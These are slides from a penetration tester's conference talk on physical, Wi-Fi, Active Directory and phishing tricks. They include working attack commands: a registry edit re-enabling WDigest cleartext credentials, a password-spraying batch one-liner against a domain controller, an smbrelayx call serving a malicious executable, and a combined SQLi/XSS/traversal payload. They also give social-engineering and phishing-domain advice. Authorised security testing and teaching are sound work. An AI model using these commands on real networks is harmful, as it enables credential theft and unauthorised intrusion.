Stupid Pentester Tricks

AKA Tantric Pentesting

by Laurent Desaulniers

@el_d33

Whoami

  • Pentester

  • Magician

  • Nsec Challenge Designer

  • Lockpicker

  • Security Amateur

Why?


If it is stupid and it works, then it is not stupid *

Context

Client has:
  • EMET/SRP/LAPS everywhere

  • Patches everywhere

  • 24/7 surveillance

  • Medeco

  • NAC

  • 15 character minimum password policy

  • No Nebtios/LLMNR/Responder <3

Context

table flip

Physical Pentest is hard

Repeat after me: I AM NOT JAMES BOND

  • ProxMark/RavenHid is conspicuous

  • Key Impressioning is hard

  • Lockpicking can be hard, under pressure

Physical is hard

key mold

Physical Pentest

  • Always keep spare keys for switching

Physical Pentest

universal

Demo 1


Universal Door Controller *

1 Pending approval from the demo gods

Universal door controller

universal door

Conspicuous Proxmark?

hazmat
hazmat

Access card

hack selfie2

Hackers take selfies too…​

selfie

Hackers take selfie too…​

Wifi is hard

Client has EAP, well configured clients, and only accepts valid certificates

table flip 2
wiphish2

Solution

Simple access point + captive portal

DO NOT use an already existing SSID

Create your own.

→ Bypasses most WIPS solutions.

Hacking is hard

With most organisations, you can still win using:

  • Responder

  • GPP

  • Mimikatz

Hacking is hard

But what happens when all of these are blocked

table flip 3

Mimikatz blocked

If you can run Mimikatz, you are admin.

You can disable the anti-Mimikatz!

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
 /v UseLogonCredential /t REG_DWORD /d 1

PowerSpray

Powerspraying is a very effective technique

Try 1 password for all accounts

Favourites:
  • Soleil01 (Quebec)

  • CompanyName2016

  • Welcome1

Passwords guaranteed

PowerSpray

No powershell? No problem!

@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) \
DO @net use DOMAINCONTROLLERIPC$ /user:DOMAIN%n %p 1>NUL 2>&1 \
&& @echo [*] %n:%p && @net use /delete DOMAINCONTROLLERIPC$ > NUL

SMB Relay

20 character password policy? No problem!

SMB Relay is very hard to protect against.

Nessus classifies the finding as low

./smbrelayx.py -h [My_IP] -e [My_EVIL_EXE]

Nothing works? Call support

If you can get tech support to connect to you, you won!

  • My favourites are:

  • "My screen’s background is asking me for money"

  • "Why did you install a dancing pig icon telling me to call tech support?"

Nothing works? Call the help desk

You can then:

invoke-mimikatz
Freeze The Ram
SMB Relay
Fake-UAC

Phishing

Improve your phishing game

Do NOT use security related motives

People are trained to recognized this as phishing.

Cheating at phishing

Test was supposed to be secret…​ But suddenly, everyone knows about it?

Cheating at phishing

phishy1

Cheating at phishing

phishy2

Cheating at phishing

I always include a SMB Relay image in all my phish.

Users are told to forward phishing to tech support

Domain selection

Using - instead of . works wonders:

stairs-mydomain.com
support-mydomain.com
wwww-mydomain.com
hr-mydomain.com

Domain Selection

Always set up valid SPF records.

Helps to prevent being categorized as spam..

Make sure that the website is properly categorized by crawler

HINT Redirect all IPs to the original website, except your target’s.

Key points

I use Phishing Frenzy for all of my phishing needs.

I am told GoPhish is very good as well.

Other tricks

Or '1'='<script>alert(1)>../../../passwd%0a%0d Referer:VeryLongDomain.com?id=342333

If the referer is crawled, you know that someone is watching the log.

Questions?

lol

Thank you